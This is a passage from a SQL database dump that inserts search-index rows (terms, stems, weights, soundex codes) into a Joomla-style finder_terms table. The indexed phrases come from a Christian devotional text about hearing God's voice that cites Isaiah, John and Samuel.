(294707, 'you and not', 'you and not', 0, 1, 1.3667, 'Y5353', 1, '*'),
(294708, 'you are walking', 'you are walking', 0, 1, 1.5, 'Y64252', 1, '*'),
(294709, 'you cannot suffer', 'you cannot suffer', 0, 1, 1.5667, 'Y253216', 1, '*'),
(294710, 'you for your', 'you for your', 0, 1, 1.4, 'Y160', 2, '*'),
(294711, 'you handle', 'you handle', 0, 1, 1.3333, 'Y534', 1, '*'),
(294712, 'you handle assignment', 'you handle assignment', 0, 1, 1.7, 'Y534253', 1, '*'),
(294713, 'you have money', 'you have money', 0, 1, 1.4667, 'Y150', 1, '*'),
(294714, 'you in wrong', 'you in wrong', 0, 1, 1.4, 'Y5652', 1, '*'),
(294715, 'you into my', 'you into my', 0, 1, 1.3667, 'Y535', 1, '*'),
(294716, 'you keep the', 'you keep the', 0, 1, 1.4, 'Y213', 1, '*'),
(294717, 'you know many', 'you know many', 0, 1, 1.4333, 'Y250', 1, '*'),
(294718, 'you may not', 'you may not', 0, 1, 1.3667, 'Y530', 2, '*'),
(294719, 'you must sustain', 'you must sustain', 0, 1, 1.5333, 'Y523235', 1, '*'),
(294720, 'you through that', 'you through that', 0, 1, 1.5333, 'Y3623', 1, '*'),
(294721, 'you till', 'you till', 0, 1, 1.2667, 'Y340', 1, '*'),
(294722, 'you till next', 'you till next', 0, 1, 1.4333, 'Y34523', 1, '*'),
(294723, 'you will sustain', 'you will sustain', 0, 1, 1.5333, 'Y4235', 1, '*'),
(294724, 'your case', 'your case', 0, 1, 1.3, 'Y620', 1, '*'),
(294725, 'your case in', 'your case in', 0, 1, 1.4, 'Y625', 1, '*'),
(294726, 'your house', 'your house', 0, 1, 1.3333, 'Y620', 1, '*'),
(294727, 'your house in', 'your house in', 0, 1, 1.4333, 'Y625', 1, '*'),
(294728, 'your life remain', 'your life remain', 0, 1, 1.5333, 'Y64165', 1, '*'),
(294729, 'your life watch', 'your life watch', 0, 1, 1.5, 'Y64132', 1, '*'),
(294730, 'your life you', 'your life you', 0, 1, 1.4333, 'Y641', 2, '*'),
(294731, 'your marriage', 'your marriage', 0, 1, 1.4333, 'Y6562', 1, '*'),
(294732, 'your marriage will', 'your marriage will', 0, 1, 1.6, 'Y65624', 1, '*'),
(294733, 'your obedience be', 'your obedience be', 0, 1, 1.5667, 'Y613521', 1, '*'),
(294734, 'your spirit over', 'your spirit over', 0, 1, 1.5333, 'Y6216316', 1, '*'),
(294735, 'your strength', 'your strength', 0, 1, 1.4333, 'Y6236523', 1, '*'),
(294736, 'your strength everything', 'your strength everything', 0, 1, 1.8, 'Y623652316352', 1, '*'),
(294737, 'yourself as', 'yourself as', 0, 1, 1.3667, 'Y62412', 1, '*'),
(294738, 'yourself as a', 'yourself as a', 0, 1, 1.4333, 'Y62412', 1, '*'),
(295155, '10 4-5', '10 4-5', 0, 1, 1.2, '', 1, '*'),
(295156, '10 4-5 says', '10 4-5 says', 0, 1, 1.3667, 'S000', 1, '*'),
(295157, '19 02', '19 02', 0, 1, 1.1667, '', 1, '*'),
(295158, '19 02 2017', '19 02 2017', 0, 1, 1.3333, '', 1, '*'),
(295159, '2017 to', '2017 to', 0, 1, 1.2333, 'T000', 1, '*'),
(295160, '2017 to develop', '2017 to develop', 0, 1, 1.5, 'T141', 1, '*'),
(295161, '2017 to learn', '2017 to learn', 0, 1, 1.4333, 'T465', 1, '*'),
(295162, '2017 will', '2017 will', 0, 1, 1.3, 'W400', 1, '*'),
(295163, '2017 will be', '2017 will be', 0, 1, 1.4, 'W410', 1, '*'),
(295164, '21 says', '21 says', 0, 1, 1.2333, 'S000', 1, '*'),
(295165, '21 says and', '21 says and', 0, 1, 1.3667, 'S530', 1, '*'),
(295166, '26 from', '26 from', 0, 1, 1.2333, 'F650', 1, '*'),
(295167, '26 from our', '26 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(295168, '3 4', '3 4', 0, 1, 1.1, '', 1, '*'),
(295169, '3 4 says', '3 4 says', 0, 1, 1.2667, 'S000', 1, '*'),
(295170, '30 21', '30 21', 0, 1, 1.1667, '', 1, '*'),
(295171, '30 21 says', '30 21 says', 0, 1, 1.3333, 'S000', 1, '*'),
(295172, '4 says “the', '4 says “the', 0, 1, 1.3667, 'S300', 1, '*'),
(295173, '4-5 says', '4-5 says', 0, 1, 1.2667, 'S000', 1, '*'),
(295174, '4-5 says and', '4-5 says and', 0, 1, 1.4, 'S530', 1, '*'),
(295175, '6 8', '6 8', 0, 1, 1.1, '', 1, '*'),
(295176, '6 8 saying', '6 8 saying', 0, 1, 1.3333, 'S520', 1, '*'),
(295177, '8 saying', '8 saying', 0, 1, 1.2667, 'S520', 1, '*'),
(295178, '8 saying “also', '8 saying “also', 0, 1, 1.4667, 'S5242', 1, '*'),
(295179, 'a man his', 'a man his', 0, 1, 1.3, 'A520', 1, '*'),
(295180, 'a man masters', 'a man masters', 0, 1, 1.4333, 'A52362', 1, '*'),
(295181, 'a stranger', 'a stranger', 0, 1, 1.3333, 'A236526', 1, '*'),
(295182, 'a stranger will', 'a stranger will', 0, 1, 1.5, 'A2365264', 1, '*'),
(295183, 'a word behind', 'a word behind', 0, 1, 1.4333, 'A63153', 1, '*'),
(295184, 'ability of', 'abil of', 0, 1, 1.3333, 'A1431', 1, '*'),
(295185, 'ability of that', 'abil of that', 0, 1, 1.5, 'A14313', 1, '*'),
(295186, 'ability to hear', 'abil to hear', 0, 1, 1.5, 'A1436', 1, '*'),
(295187, 'advantage in', 'advantag in', 0, 1, 1.4, 'A315325', 1, '*'),
(295188, 'advantage in life', 'advantag in life', 0, 1, 1.5667, 'A31532541', 1, '*'),
(295189, 'ahead till', 'ahead till', 0, 1, 1.3333, 'A340', 1, '*'),
(295190, 'ahead till next', 'ahead till next', 0, 1, 1.5, 'A34523', 1, '*'),
(295191, 'allocations it', 'alloc it', 0, 1, 1.4667, 'A423523', 1, '*'),
(295192, 'allocations it is', 'alloc it is', 0, 1, 1.5667, 'A4235232', 1, '*'),
(295193, 'also always', 'also always', 0, 1, 1.3667, 'A4242', 1, '*'),
(295194, 'also always in', 'also always in', 0, 1, 1.4667, 'A42425', 1, '*'),
(295195, 'always and', 'alwai and', 0, 1, 1.3333, 'A4253', 1, '*'),
(295196, 'always and that', 'alwai and that', 0, 1, 1.5, 'A4253', 1, '*'),
(295197, 'always in the', 'alwai in the', 0, 1, 1.4333, 'A4253', 1, '*'),
(295198, 'am i', 'am i', 0, 1, 1.1333, 'A500', 3, '*'),
(295199, 'am i send', 'am i send', 0, 1, 1.3, 'A5253', 2, '*'),
(295200, 'am i”.', 'am i”.', 0, 1, 1.2, 'A500', 1, '*'),
(295201, 'am i”. from', 'am i”. from', 0, 1, 1.3667, 'A5165', 1, '*'),
(295202, 'an advantage in', 'an advantage in', 0, 1, 1.5, 'A5315325', 1, '*'),
(295203, 'and a stranger', 'and a stranger', 0, 1, 1.4667, 'A53236526', 1, '*'),
(295204, 'and forward isaiah', 'and forward isaiah', 0, 1, 1.6, 'A531632', 1, '*'),
(295205, 'and get stranded', 'and get stranded', 0, 1, 1.5333, 'A532323653', 1, '*'),
(295206, 'and he answered', 'and he answered', 0, 1, 1.5, 'A535263', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(295207, 'and new realms', 'and new realms', 0, 1, 1.4667, 'A5356452', 1, '*'),
(295208, 'and opens', 'and opens', 0, 1, 1.3, 'A53152', 1, '*'),
(295209, 'and opens new', 'and opens new', 0, 1, 1.4333, 'A531525', 1, '*'),
(295210, 'and outcry', 'and outcry', 0, 1, 1.3333, 'A5326', 1, '*'),
(295211, 'and outcry be', 'and outcry be', 0, 1, 1.4333, 'A53261', 1, '*'),
(295212, 'and participation', 'and participation', 0, 1, 1.5667, 'A531632135', 1, '*'),
(295213, 'and participation of', 'and participation of', 0, 1, 1.6667, 'A5316321351', 1, '*'),
(295214, 'and respond', 'and respond', 0, 1, 1.3667, 'A5362153', 1, '*'),
(295215, 'and respond to', 'and respond to', 0, 1, 1.4667, 'A5362153', 1, '*'),
(295216, 'and safety', 'and safety', 0, 1, 1.3333, 'A53213', 1, '*'),
(295217, 'and safety in', 'and safety in', 0, 1, 1.4333, 'A532135', 1, '*'),
(295218, 'and success', 'and success', 0, 1, 1.3667, 'A532', 1, '*'),
(295219, 'and success in', 'and success in', 0, 1, 1.4667, 'A5325', 1, '*'),
(295220, 'and that will', 'and that will', 0, 1, 1.4333, 'A534', 1, '*'),
(295221, 'and the sheep', 'and the sheep', 0, 1, 1.4333, 'A5321', 1, '*'),
(295222, 'and thine ears', 'and thine ears', 0, 1, 1.4667, 'A53562', 1, '*'),
(295223, 'and when he', 'and when he', 0, 1, 1.3667, 'A535', 1, '*'),
(295224, 'and when ye', 'and when ye', 0, 1, 1.3667, 'A535', 1, '*'),
(295225, 'and who', 'and who', 0, 1, 1.2333, 'A530', 2, '*'),
(295226, 'and who will', 'and who will', 0, 1, 1.4, 'A534', 2, '*'),
(295227, 'answered here', 'answer here', 0, 1, 1.4333, 'A52636', 1, '*'),
(295228, 'answered here am', 'answer here am', 0, 1, 1.5333, 'A526365', 1, '*'),
(295229, 'any time', 'ani time', 0, 1, 1.2667, 'A535', 1, '*'),
(295230, 'any time we', 'ani time we', 0, 1, 1.3667, 'A535', 1, '*'),
(295231, 'are also', 'ar also', 0, 1, 1.2667, 'A642', 1, '*'),
(295232, 'are also always', 'ar also always', 0, 1, 1.5, 'A64242', 1, '*'),
(295233, 'are hearing', 'ar hearing', 0, 1, 1.3667, 'A652', 1, '*'),
(295234, 'are hearing wrong', 'ar hearing wrong', 0, 1, 1.5667, 'A652652', 1, '*'),
(295235, 'are many voices', 'ar many voices', 0, 1, 1.5, 'A6512', 1, '*'),
(295236, 'are not hearing', 'ar not hearing', 0, 1, 1.5, 'A653652', 1, '*'),
(295237, 'at an advantage', 'at an advantage', 0, 1, 1.5, 'A3531532', 1, '*'),
(295238, 'be at an', 'be at an', 0, 1, 1.2667, 'B350', 1, '*'),
(295239, 'be dependent', 'be dependent', 0, 1, 1.4, 'B315353', 1, '*'),
(295240, 'be dependent on', 'be dependent on', 0, 1, 1.5, 'B3153535', 1, '*'),
(295241, 'be in 2017', 'be in 2017', 0, 1, 1.3333, 'B500', 1, '*'),
(295242, 'be led', 'be led', 0, 1, 1.2, 'B430', 1, '*'),
(295243, 'be led by', 'be led by', 0, 1, 1.3, 'B431', 1, '*'),
(295244, 'before them and', 'befor them and', 0, 1, 1.5, 'B6353', 1, '*'),
(295245, 'before your', 'befor your', 0, 1, 1.3667, 'B600', 1, '*'),
(295246, 'before your ability', 'befor your ability', 0, 1, 1.6333, 'B6143', 1, '*'),
(295247, 'before your next', 'befor your next', 0, 1, 1.5333, 'B6523', 1, '*'),
(295248, 'behind thee', 'behind thee', 0, 1, 1.3667, 'B530', 1, '*'),
(295249, 'behind thee saying', 'behind thee saying', 0, 1, 1.6, 'B53252', 1, '*'),
(295250, 'beloved john', 'belov john', 0, 1, 1.4, 'B41325', 1, '*'),
(295251, 'beloved john 10', 'belov john 10', 0, 1, 1.5, 'B41325', 1, '*'),
(295252, 'brings new', 'bring new', 0, 1, 1.3333, 'B6525', 1, '*'),
(295253, 'brings new mercies', 'bring new mercies', 0, 1, 1.6, 'B652562', 1, '*'),
(295254, 'but men are', 'but men are', 0, 1, 1.3667, 'B356', 1, '*'),
(295255, 'but will flee', 'but will flee', 0, 1, 1.4333, 'B3414', 1, '*'),
(295256, 'by faith this', 'by faith this', 0, 1, 1.4333, 'B320', 1, '*'),
(295257, 'by the holy', 'by the holy', 0, 1, 1.3667, 'B340', 1, '*'),
(295258, 'call every', 'call every', 0, 1, 1.3333, 'C416', 1, '*'),
(295259, 'call every time', 'call every time', 0, 1, 1.5, 'C41635', 1, '*'),
(295260, 'called samuel', 'call samuel', 0, 1, 1.4333, 'C43254', 1, '*'),
(295261, 'called samuel and', 'call samuel and', 0, 1, 1.5667, 'C4325453', 1, '*'),
(295262, 'can recognize', 'can recognize', 0, 1, 1.4333, 'C56252', 1, '*'),
(295263, 'can recognize and', 'can recognize and', 0, 1, 1.5667, 'C5625253', 1, '*'),
(295264, 'children but', 'children but', 0, 1, 1.4, 'C436513', 1, '*'),
(295265, 'children but men', 'children but men', 0, 1, 1.5333, 'C4365135', 1, '*'),
(295266, 'comes to a', 'come to a', 0, 1, 1.3333, 'C523', 1, '*'),
(295267, 'comes to us', 'come to us', 0, 1, 1.3667, 'C5232', 1, '*'),
(295268, 'correctly or', 'correctli or', 0, 1, 1.4, 'C62346', 1, '*'),
(295269, 'correctly or they', 'correctli or they', 0, 1, 1.5667, 'C623463', 1, '*'),
(295270, 'daily allocations', 'daili allocations', 0, 1, 1.5667, 'D42352', 1, '*'),
(295271, 'daily allocations it', 'daili allocations it', 0, 1, 1.6667, 'D423523', 1, '*'),
(295272, 'days ahead till', 'dai ahead till', 0, 1, 1.5, 'D234', 1, '*'),
(295273, 'dearly beloved john', 'dearli beloved john', 0, 1, 1.6333, 'D64141325', 1, '*'),
(295274, 'dependent', 'depend', 0, 0, 0.6, 'D15353', 1, '*'),
(295275, 'dependent on', 'depend on', 0, 1, 1.4, 'D153535', 1, '*'),
(295276, 'dependent on how', 'depend on how', 0, 1, 1.5333, 'D153535', 1, '*'),
(295277, 'desire and outcry', 'desir and outcry', 0, 1, 1.5667, 'D265326', 1, '*'),
(295278, 'develop more', 'develop more', 0, 1, 1.4, 'D14156', 1, '*'),
(295279, 'develop more than', 'develop more than', 0, 1, 1.5667, 'D1415635', 1, '*'),
(295280, 'difference i', 'differ i', 0, 1, 1.4, 'D1652', 1, '*'),
(295281, 'difference i want', 'differ i want', 0, 1, 1.5667, 'D165253', 1, '*'),
(295282, 'direction and participation', 'direct and participation', 0, 1, 1.9, 'D623531632135', 1, '*'),
(295283, 'directly linked', 'directli linked', 0, 1, 1.5, 'D6234523', 1, '*'),
(295284, 'directly linked to', 'directli linked to', 0, 1, 1.6, 'D6234523', 1, '*'),
(295285, 'ears shall', 'ear shall', 0, 1, 1.3333, 'E624', 1, '*'),
(295286, 'ears shall hear', 'ear shall hear', 0, 1, 1.5, 'E6246', 1, '*'),
(295287, 'every sheep', 'everi sheep', 0, 1, 1.3667, 'E1621', 1, '*'),
(295288, 'every sheep is', 'everi sheep is', 0, 1, 1.4667, 'E16212', 1, '*'),
(295289, 'every time i', 'everi time i', 0, 1, 1.4, 'E1635', 1, '*'),
(295290, 'failed before', 'fail before', 0, 1, 1.4333, 'F4316', 1, '*'),
(295291, 'failed before your', 'fail before your', 0, 1, 1.6, 'F4316', 1, '*'),
(295292, 'faith this', 'faith this', 0, 1, 1.3333, 'F320', 1, '*'),
(295293, 'faith this is', 'faith this is', 0, 1, 1.4333, 'F320', 1, '*'),
(295294, 'father\'s heart 19', 'father heart 19', 0, 1, 1.5667, 'F36263', 2, '*'),
(295295, 'flee from', 'flee from', 0, 1, 1.3, 'F4165', 1, '*'),
(295296, 'flee from him', 'flee from him', 0, 1, 1.4333, 'F4165', 1, '*'),
(295297, 'follow but', 'follow but', 0, 1, 1.3333, 'F413', 1, '*'),
(295298, 'follow but will', 'follow but will', 0, 1, 1.5, 'F4134', 1, '*'),
(295299, 'follow him', 'follow him', 0, 1, 1.3333, 'F450', 1, '*'),
(295300, 'follow him for', 'follow him for', 0, 1, 1.4667, 'F4516', 1, '*'),
(295301, 'for they know', 'for they know', 0, 1, 1.4333, 'F6325', 1, '*'),
(295302, 'for us then', 'for us then', 0, 1, 1.3667, 'F6235', 2, '*'),
(295303, 'forth his own', 'forth his own', 0, 1, 1.4333, 'F6325', 1, '*'),
(295304, 'forward isaiah', 'forward isaiah', 0, 1, 1.4667, 'F632', 1, '*'),
(295305, 'forward isaiah heard', 'forward isaiah heard', 0, 1, 1.6667, 'F63263', 1, '*'),
(295306, 'from him for', 'from him for', 0, 1, 1.4, 'F6516', 1, '*'),
(295307, 'from that point', 'from that point', 0, 1, 1.5, 'F653153', 2, '*'),
(295308, 'get stranded', 'get stranded', 0, 1, 1.4, 'G323653', 1, '*'),
(295309, 'get stranded they', 'get stranded they', 0, 1, 1.5667, 'G323653', 1, '*'),
(295310, 'gives us', 'give us', 0, 1, 1.2667, 'G120', 2, '*'),
(295311, 'gives us our', 'give us our', 0, 1, 1.4, 'G126', 1, '*'),
(295312, 'go for us', 'go for us', 0, 1, 1.3, 'G162', 2, '*'),
(295313, 'god comes to', 'god comes to', 0, 1, 1.4, 'G32523', 1, '*'),
(295314, 'god somewhere', 'god somewhere', 0, 1, 1.4333, 'G3256', 1, '*'),
(295315, 'god somewhere that', 'god somewhere that', 0, 1, 1.6, 'G32563', 1, '*'),
(295316, 'god we', 'god we', 0, 1, 1.2, 'G300', 1, '*'),
(295317, 'god we lose', 'god we lose', 0, 1, 1.3667, 'G342', 1, '*'),
(295318, 'god\'s call every', 'god call every', 0, 1, 1.5333, 'G32416', 1, '*'),
(295319, 'god\'s voice', 'god voice', 0, 1, 1.3667, 'G3212', 1, '*'),
(295320, 'god\'s voice that', 'god voice that', 0, 1, 1.5333, 'G32123', 1, '*'),
(295321, 'god\'s voice there', 'god voice there', 0, 1, 1.5667, 'G321236', 1, '*'),
(295322, 'god\'s voice you', 'god voice you', 0, 1, 1.5, 'G3212', 1, '*'),
(295323, 'goeth', 'goeth', 0, 0, 0.3333, 'G300', 1, '*'),
(295324, 'goeth before', 'goeth before', 0, 1, 1.4, 'G316', 1, '*'),
(295325, 'goeth before them', 'goeth before them', 0, 1, 1.5667, 'G31635', 1, '*'),
(295326, 'guarantees our', 'guarante our', 0, 1, 1.4667, 'G65326', 1, '*'),
(295327, 'guarantees our safety', 'guarante our safety', 0, 1, 1.7, 'G65326213', 1, '*'),
(295328, 'guaranty', 'guaranti', 0, 0, 0.5333, 'G653', 1, '*'),
(295329, 'guaranty your', 'guaranti your', 0, 1, 1.4333, 'G6536', 1, '*'),
(295330, 'guaranty your perpetual', 'guaranti your perpetual', 0, 1, 1.7667, 'G653616134', 1, '*'),
(295331, 'habit of', 'habit of', 0, 1, 1.2667, 'H131', 1, '*'),
(295332, 'habit of not', 'habit of not', 0, 1, 1.4, 'H13153', 1, '*'),
(295333, 'habit of speaking', 'habit of speaking', 0, 1, 1.5667, 'H13121252', 1, '*'),
(295334, 'hand and', 'hand and', 0, 1, 1.2667, 'H5353', 1, '*'),
(295335, 'hand and when', 'hand and when', 0, 1, 1.4333, 'H53535', 1, '*'),
(295336, 'has never failed', 'ha never failed', 0, 1, 1.5333, 'H2516143', 1, '*'),
(295337, 'he answered here', 'he answered here', 0, 1, 1.5333, 'H52636', 1, '*'),
(295338, 'he goeth', 'he goeth', 0, 1, 1.2667, 'H230', 1, '*'),
(295339, 'he goeth before', 'he goeth before', 0, 1, 1.5, 'H2316', 1, '*'),
(295340, 'he putteth', 'he putteth', 0, 1, 1.3333, 'H130', 1, '*'),
(295341, 'he putteth forth', 'he putteth forth', 0, 1, 1.5333, 'H13163', 1, '*'),
(295342, 'hear a', 'hear a', 0, 1, 1.2, 'H600', 1, '*'),
(295343, 'hear a word', 'hear a word', 0, 1, 1.3667, 'H630', 1, '*'),
(295344, 'hear god\'s', 'hear god', 0, 1, 1.3333, 'H6232', 1, '*'),
(295345, 'hear god\'s voice', 'hear god voice', 0, 1, 1.5333, 'H623212', 1, '*'),
(295346, 'hear the voice', 'hear the voice', 0, 1, 1.4667, 'H6312', 1, '*'),
(295347, 'heard the', 'heard the', 0, 1, 1.3, 'H630', 2, '*'),
(295348, 'heard the voice', 'heard the voice', 0, 1, 1.5, 'H6312', 2, '*'),
(295349, 'hearing', 'hear', 0, 0, 0.4667, 'H652', 1, '*'),
(295350, 'hearing correctly', 'hear correctly', 0, 1, 1.5667, 'H6526234', 1, '*'),
(295351, 'hearing correctly or', 'hear correctly or', 0, 1, 1.6667, 'H65262346', 1, '*'),
(295352, 'hearing the', 'hear the', 0, 1, 1.3667, 'H6523', 1, '*'),
(295353, 'hearing the voice', 'hear the voice', 0, 1, 1.5667, 'H652312', 1, '*'),
(295354, 'hearing wrong', 'hear wrong', 0, 1, 1.4333, 'H652652', 1, '*'),
(295355, 'hearing wrong voice', 'hear wrong voice', 0, 1, 1.6333, 'H65265212', 1, '*'),
(295356, 'heart 19', 'heart 19', 0, 1, 1.2667, 'H630', 2, '*'),
(295357, 'heart 19 02', 'heart 19 02', 0, 1, 1.3667, 'H630', 1, '*'),
(295358, 'heights and', 'height and', 0, 1, 1.3667, 'H23253', 1, '*'),
(295359, 'heights and new', 'height and new', 0, 1, 1.5, 'H232535', 1, '*'),
(295360, 'here am', 'here am', 0, 1, 1.2333, 'H650', 2, '*'),
(295361, 'here am i', 'here am i', 0, 1, 1.3, 'H650', 2, '*'),
(295362, 'here am i”.', 'here am i”.', 0, 1, 1.3667, 'H650', 1, '*'),
(295363, 'him for', 'him for', 0, 1, 1.2333, 'H516', 2, '*'),
(295364, 'him for they', 'him for they', 0, 1, 1.4, 'H5163', 1, '*'),
(295365, 'his children but', 'hi children but', 0, 1, 1.5333, 'H2436513', 1, '*'),
(295366, 'his life picks', 'hi life picks', 0, 1, 1.4667, 'H2412', 1, '*'),
(295367, 'his own sheep', 'hi own sheep', 0, 1, 1.4333, 'H2521', 1, '*'),
(295368, 'his voice when', 'hi voice when', 0, 1, 1.4667, 'H2125', 1, '*'),
(295369, 'how to live', 'how to live', 0, 1, 1.3667, 'H341', 1, '*'),
(295370, 'i heard', 'i heard', 0, 1, 1.2333, 'I630', 2, '*'),
(295371, 'i heard the', 'i heard the', 0, 1, 1.3667, 'I630', 2, '*'),
(295372, 'i here', 'i here', 0, 1, 1.2, 'I600', 2, '*'),
(295373, 'i here am', 'i here am', 0, 1, 1.3, 'I650', 2, '*'),
(295374, 'i must', 'i must', 0, 1, 1.2, 'I523', 1, '*'),
(295375, 'i must master', 'i must master', 0, 1, 1.4333, 'I5235236', 1, '*'),
(295376, 'i sam', 'i sam', 0, 1, 1.1667, 'I250', 1, '*'),
(295377, 'i sam 3', 'i sam 3', 0, 1, 1.2333, 'I250', 1, '*'),
(295378, 'i see men', 'i see men', 0, 1, 1.3, 'I250', 1, '*'),
(295379, 'i send', 'i send', 0, 1, 1.2, 'I253', 2, '*'),
(295380, 'i send and', 'i send and', 0, 1, 1.3333, 'I25353', 2, '*'),
(295381, 'i send me”.', 'i send me”.', 0, 1, 1.3667, 'I2535', 1, '*'),
(295382, 'i started', 'i started', 0, 1, 1.3, 'I2363', 2, '*'),
(295383, 'i started ministry', 'i started ministry', 0, 1, 1.6, 'I23635236', 1, '*'),
(295384, 'in 2017 to', 'in 2017 to', 0, 1, 1.3333, 'I530', 1, '*'),
(295385, 'in 2017 will', 'in 2017 will', 0, 1, 1.4, 'I540', 1, '*'),
(295386, 'in god it', 'in god it', 0, 1, 1.3, 'I523', 1, '*'),
(295387, 'in isaiah', 'in isaiah', 0, 1, 1.3, 'I520', 1, '*'),
(295388, 'in isaiah 6', 'in isaiah 6', 0, 1, 1.3667, 'I520', 1, '*'),
(295389, 'in it', 'in it', 0, 1, 1.1667, 'I530', 1, '*'),
(295390, 'in it when', 'in it when', 0, 1, 1.3333, 'I535', 1, '*'),
(295391, 'in life god', 'in life god', 0, 1, 1.3667, 'I54123', 1, '*'),
(295392, 'in life let', 'in life let', 0, 1, 1.3667, 'I54143', 1, '*'),
(295393, 'in the ability', 'in the ability', 0, 1, 1.4667, 'I53143', 1, '*'),
(295394, 'in the days', 'in the days', 0, 1, 1.3667, 'I532', 1, '*'),
(295395, 'in the habit', 'in the habit', 0, 1, 1.4, 'I5313', 1, '*'),
(295396, 'in your ability', 'in your ability', 0, 1, 1.5, 'I56143', 1, '*'),
(295397, 'is always in', 'is always in', 0, 1, 1.4, 'I2425', 1, '*'),
(295398, 'is because they', 'is because they', 0, 1, 1.5, 'I2123', 1, '*'),
(295399, 'is directly linked', 'is directly linked', 0, 1, 1.6, 'I236234523', 1, '*'),
(295400, 'is god\'s voice', 'is god voice', 0, 1, 1.4667, 'I23212', 1, '*'),
(295401, 'is only', 'is only', 0, 1, 1.2333, 'I254', 1, '*'),
(295402, 'is only one', 'is only one', 0, 1, 1.3667, 'I2545', 1, '*'),
(295403, 'is the voice', 'is the voice', 0, 1, 1.4, 'I2312', 1, '*'),
(295404, 'is what makes', 'is what makes', 0, 1, 1.4333, 'I2352', 2, '*'),
(295405, 'isaiah 30', 'isaiah 30', 0, 1, 1.3, 'I200', 1, '*'),
(295406, 'isaiah 30 21', 'isaiah 30 21', 0, 1, 1.4, 'I200', 1, '*'),
(295407, 'isaiah 6', 'isaiah 6', 0, 1, 1.2667, 'I200', 2, '*'),
(295408, 'isaiah 6 8', 'isaiah 6 8', 0, 1, 1.3333, 'I200', 1, '*'),
(295409, 'isaiah heard', 'isaiah heard', 0, 1, 1.4, 'I263', 1, '*'),
(295410, 'isaiah heard the', 'isaiah heard the', 0, 1, 1.5333, 'I263', 1, '*'),
(295411, 'isthe', 'isth', 0, 0, 0.3333, 'I230', 1, '*'),
(295412, 'isthe voice', 'isth voice', 0, 1, 1.3667, 'I2312', 1, '*'),
(295413, 'isthe voice of', 'isth voice of', 0, 1, 1.4667, 'I23121', 1, '*'),
(295414, 'it is because', 'it is because', 0, 1, 1.4333, 'I3212', 1, '*'),
(295415, 'it is god\'s', 'it is god', 0, 1, 1.3667, 'I3232', 1, '*'),
(295416, 'it is only', 'it is only', 0, 1, 1.3333, 'I3254', 1, '*'),
(295417, 'it isthe', 'it isthe', 0, 1, 1.2667, 'I323', 1, '*'),
(295418, 'it isthe voice', 'it isthe voice', 0, 1, 1.4667, 'I32312', 1, '*'),
(295419, 'it when ye', 'it when ye', 0, 1, 1.3333, 'I350', 1, '*'),
(295420, 'item 26', 'item 26', 0, 1, 1.2333, 'I350', 1, '*'),
(295421, 'item 26 from', 'item 26 from', 0, 1, 1.4, 'I35165', 1, '*'),
(295422, 'i”.', 'i”.', 0, 0, 0.2, 'I000', 1, '*'),
(295423, 'i”. from', 'i”. from', 0, 1, 1.2667, 'I165', 1, '*'),
(295424, 'i”. from that', 'i”. from that', 0, 1, 1.4333, 'I1653', 1, '*'),
(295425, 'john 10', 'john 10', 0, 1, 1.2333, 'J500', 1, '*'),
(295426, 'john 10 4-5', 'john 10 4-5', 0, 1, 1.3667, 'J500', 1, '*'),
(295427, 'journey of samuel', 'journei of samuel', 0, 1, 1.5667, 'J651254', 1, '*'),
(295428, 'k2 item 26', 'k2 item 26', 0, 1, 1.3333, 'K350', 1, '*'),
(295429, 'know his', 'know his', 0, 1, 1.2667, 'K520', 1, '*'),
(295430, 'know his voice', 'know his voice', 0, 1, 1.4667, 'K5212', 1, '*'),
(295431, 'know not', 'know not', 0, 1, 1.2667, 'K530', 1, '*'),
(295432, 'know not the', 'know not the', 0, 1, 1.4, 'K530', 1, '*'),
(295433, 'learn more', 'learn more', 0, 1, 1.3333, 'L656', 1, '*'),
(295434, 'learn more to', 'learn more to', 0, 1, 1.4333, 'L6563', 1, '*'),
(295435, 'led by', 'led by', 0, 1, 1.2, 'L310', 1, '*'),
(295436, 'led by the', 'led by the', 0, 1, 1.3333, 'L313', 1, '*'),
(295437, 'left.”', 'left.”', 0, 0, 0.4, 'L130', 1, '*'),
(295438, 'left.” god', 'left.” god', 0, 1, 1.3333, 'L1323', 1, '*'),
(295439, 'left.” god is', 'left.” god is', 0, 1, 1.4333, 'L13232', 1, '*'),
(295440, 'let your desire', 'let your desire', 0, 1, 1.5, 'L36326', 1, '*'),
(295441, 'level is', 'level is', 0, 1, 1.2667, 'L142', 1, '*'),
(295442, 'level is directly', 'level is directly', 0, 1, 1.5667, 'L14236234', 1, '*'),
(295443, 'life and get', 'life and get', 0, 1, 1.4, 'L15323', 1, '*'),
(295444, 'life god told', 'life god told', 0, 1, 1.4333, 'L12343', 1, '*'),
(295445, 'life let your', 'life let your', 0, 1, 1.4333, 'L1436', 1, '*'),
(295446, 'life picks', 'life picks', 0, 1, 1.3333, 'L120', 1, '*'),
(295447, 'life picks up', 'life picks up', 0, 1, 1.4333, 'L121', 1, '*'),
(295448, 'life to us', 'life to us', 0, 1, 1.3333, 'L132', 1, '*'),
(295449, 'linked', 'link', 0, 0, 0.4, 'L523', 1, '*'),
(295450, 'linked to', 'link to', 0, 1, 1.3, 'L523', 1, '*'),
(295451, 'linked to your', 'link to your', 0, 1, 1.4667, 'L5236', 1, '*'),
(295452, 'listen to the', 'listen to the', 0, 1, 1.4333, 'L2353', 1, '*'),
(295453, 'listening to his', 'listen to his', 0, 1, 1.5333, 'L235232', 1, '*'),
(295454, 'live by faith', 'live by faith', 0, 1, 1.4333, 'L130', 1, '*'),
(295455, 'lives it', 'live it', 0, 1, 1.2667, 'L123', 1, '*'),
(295456, 'lives it isthe', 'live it isthe', 0, 1, 1.4667, 'L12323', 1, '*'),
(295457, 'lord and that', 'lord and that', 0, 1, 1.4333, 'L6353', 1, '*'),
(295458, 'lord any', 'lord any', 0, 1, 1.2667, 'L635', 1, '*'),
(295459, 'lord any time', 'lord any time', 0, 1, 1.4333, 'L63535', 1, '*'),
(295460, 'lord called', 'lord called', 0, 1, 1.3667, 'L63243', 1, '*'),
(295461, 'lord called samuel', 'lord called samuel', 0, 1, 1.6, 'L63243254', 1, '*'),
(295462, 'lord comes', 'lord comes', 0, 1, 1.3333, 'L63252', 1, '*'),
(295463, 'lord comes to', 'lord comes to', 0, 1, 1.4333, 'L632523', 1, '*'),
(295464, 'lord he will', 'lord he will', 0, 1, 1.4, 'L634', 1, '*'),
(295465, 'lord in isaiah', 'lord in isaiah', 0, 1, 1.4667, 'L6352', 1, '*'),
